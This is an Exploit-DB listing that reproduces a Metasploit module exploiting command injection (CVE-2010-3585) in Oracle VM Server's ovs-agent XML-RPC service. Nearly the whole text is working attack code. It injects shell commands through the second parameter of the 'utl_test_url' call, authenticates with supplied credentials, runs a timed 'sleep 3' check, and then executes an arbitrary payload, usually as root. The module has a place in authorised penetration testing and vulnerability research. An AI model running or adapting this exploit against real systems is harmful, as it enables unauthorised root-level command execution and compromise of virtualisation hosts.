Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)

EDB-ID:

16915




Platform:

Linux

Date:

2010-10-25


##
# $Id: oracle_vm_agent_utl.rb 10821 2010-10-25 20:58:49Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle VM Server Virtual Server Agent Command Injection',
			'Description'    => %q{
					This module exploits a command injection flaw within Oracle\'s VM Server
				Virtual Server Agent (ovs-agent) service.

				By including shell meta characters within the second parameter to the 'utl_test_url'
				XML-RPC methodCall, an attacker can execute arbitrary commands. The service
				typically runs with root privileges.

				NOTE: Valid credentials are required to trigger this vulnerable. The username
				appears to be hardcoded as 'oracle', but the password is set by the administrator
				at installation time.
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10821 $',
			'References'     =>
				[
					# ovs-agent.spec:- Fix ovs agent command injection [orabug 10146644] {CVE-2010-3585}
					['CVE', '2010-3585'],
					['OSVDB', '68797'],
					['BID', '44047']
				],
			'Privileged'     => true,
			'Platform'       => ['unix', 'linux'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space' => 512,
					'BadChars' => '<>',
					'DisableNops' => true,
					'Keys'  => ['cmd', 'cmd_bash'],
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Oct 12 2010'
			))

		register_options(
			[
				Opt::RPORT(8899),
				OptBool.new('SSL', [ true, 'Use SSL', true ]),
				OptString.new('CMD', [ false,  "A single command to execute instead of the payload" ]),
				OptString.new('USERNAME', [ true,  "The user to authenticate as", 'oracle']),
				OptString.new('PASSWORD', [ true,  "The password to authenticate with" ])
			], self.class)

		deregister_options(
			'HTTP::junk_params', # not your typical POST, so don't inject params.
			'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
			)
	end

	def go(command)
		datastore['BasicAuthUser'] = datastore['USERNAME']
		datastore['BasicAuthPass'] = datastore['PASSWORD']

		xml = <<-EOS
<?xml version="1.0"?>
<methodCall>
<methodName>utl_test_url</methodName>
<params><param>
<value><string>PARAM1</string></value>
</param></params>
<params><param>
<value><string>PARAM2</string></value>
</param></params>
<params><param>
<value><string>PARAM3</string></value>
</param></params>
<params><param>
<value><string>PARAM4</string></value>
</param></params>
</methodCall>
EOS

		sploit = rand_text_alphanumeric(rand(128)+32)
		sploit << "';" + command + ";'"

		xml.gsub!(/PARAM1/, 'http://' + rand_text_alphanumeric(rand(128)+32) + '/')
		xml.gsub!(/PARAM2/, sploit)
		xml.gsub!(/PARAM3/, rand_text_alphanumeric(rand(128)+32))
		xml.gsub!(/PARAM4/, rand_text_alphanumeric(rand(128)+32))

		res = send_request_cgi(
			{
				'uri'          => '/RPC2',
				'method'       => 'POST',
				'ctype'        => 'application/xml',
				'data'         => xml,
			}, 5)

		if not res
			if not session_created?
				print_error('Unable to complete XML-RPC request')	
				return nil
			end
			
			# no response, but session created!!!
			return true
		end

		case res.code
		when 403
			print_error('Authentication failed!')
			return nil

		when 200
			print_good('Our request was accepted!')
			return res

		end

		print_error("Encountered unexpected #{res.code} reponse:")
		print_error(res.inspect)

		return nil
	end

	def check
		print_status("Attempting to detect if the server is vulnerable...")

		# Try running/timing sleep 3
		start = Time.now
		go('sleep 3')
		elapsed = Time.now - start
		if elapsed >= 3 and elapsed <= 4
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		print_status("Attempting to execute the payload...")

		cmd = datastore['CMD']
		cmd ||= payload.encoded

		if not go(cmd)
			raise RuntimeError, "Unable to execute the desired command"
		end

		handler
	end

end